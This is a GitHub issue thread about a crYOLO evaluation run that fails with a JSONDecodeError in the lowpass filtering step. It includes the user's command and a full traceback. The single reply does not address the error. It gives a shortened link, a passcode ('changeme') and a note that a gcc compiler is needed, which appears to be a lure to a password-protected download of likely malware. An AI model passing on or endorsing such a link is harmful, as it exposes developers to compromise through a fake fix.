### ISSUE TITLE
Errors when running evaluation

### ISSUE THREAD

**Issue by Amy1809** [MPI-Dortmund/cryolo#21]
I am trying to run an evaluation for my tomogram prediction, here is my input parameters:
```
/home/miniconda3/envs/cryolo/bin/cryolo_gui.py evaluation 
-c /DATASDD2/raw-3/config_cryolo.json 
-w /DATASDD2/raw-3/cryolo_model.h5 
-r /DATASDD2/raw-3/logs/runfiles/20240904-164904.json 
-o result_evaluation.html 
-g 0 
```
I am getting such error when running evaluation:
```
Initialization of model with /home/amyidan/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/full_yolo_backend.h5

 Load weights:  /DATASDD2/amyidan/raw-3/cryolo_model.h5
multiprocessing.pool.RemoteTraceback: 
"""
Traceback (most recent call last):
  File "/home/miniconda3/envs/cryolo/lib/python3.8/multiprocessing/pool.py", line 125, in worker
    result = (True, func(*args, **kwds))
  File "/home/miniconda3/envs/cryolo/lib/python3.8/multiprocessing/pool.py", line 51, in starmapstar
    return list(itertools.starmap(args[0], args[1]))
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/lowpass.py", line 257, in filter_single_image_and_write_to_disk
    validate_and_dump_state([filtered_img_tmp_file_path], current_state)
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/lowpass.py", line 126, in validate_and_dump_state
    json_content = json.load(f)
  File "/home/miniconda3/envs/cryolo/lib/python3.8/json/__init__.py", line 293, in load
    return loads(fp.read(),
  File "/home/miniconda3/envs/cryolo/lib/python3.8/json/__init__.py", line 357, in loads
    return _default_decoder.decode(s)
  File "/home/miniconda3/envs/cryolo/lib/python3.8/json/decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/home/miniconda3/envs/cryolo/lib/python3.8/json/decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
"""

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/miniconda3/envs/cryolo/bin/cryolo_gui.py", line 8, in <module>
    sys.exit(_main_())
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/cryolo_main.py", line 462, in _main_
    Gooey(
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/gooey/python_bindings/gooey_decorator.py", line 134, in <lambda>
    return lambda *args, **kwargs: func(*args, **kwargs)
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/cryolo_main.py", line 428, in main
    evaluation.main(args)
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/eval.py", line 213, in main
    datasets = prepare_datasets(
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/eval.py", line 644, in prepare_datasets
    predict_results, _ = predict.do_prediction(
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/predict.py", line 2157, in do_prediction
    img_paths_filtered = do_filtering(
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/predict.py", line 1840, in do_filtering
    img_paths_filtered = utils.filter_images_lowpass(
  File "/home/miniconda3/envs/cryolo/lib/python3.8/site-packages/cryolo/utils.py", line 813, in filter_images_lowpass
    filtered_images = pool.starmap(
  File "/home/miniconda3/envs/cryolo/lib/python3.8/multiprocessing/pool.py", line 372, in starmap
    return self._map_async(func, iterable, starmapstar, chunksize).get()
  File "/home/miniconda3/envs/cryolo/lib/python3.8/multiprocessing/pool.py", line 771, in get
    raise self._value
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
```
I installed crYOLO with wxpython=4.1.1, python=3.8 and pyqt=5. The training and the prediction are running fine. Does anyone have an idea on how this is caused? Any suggestions will be very appreciated.

**Comment by AlienDarkCat** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
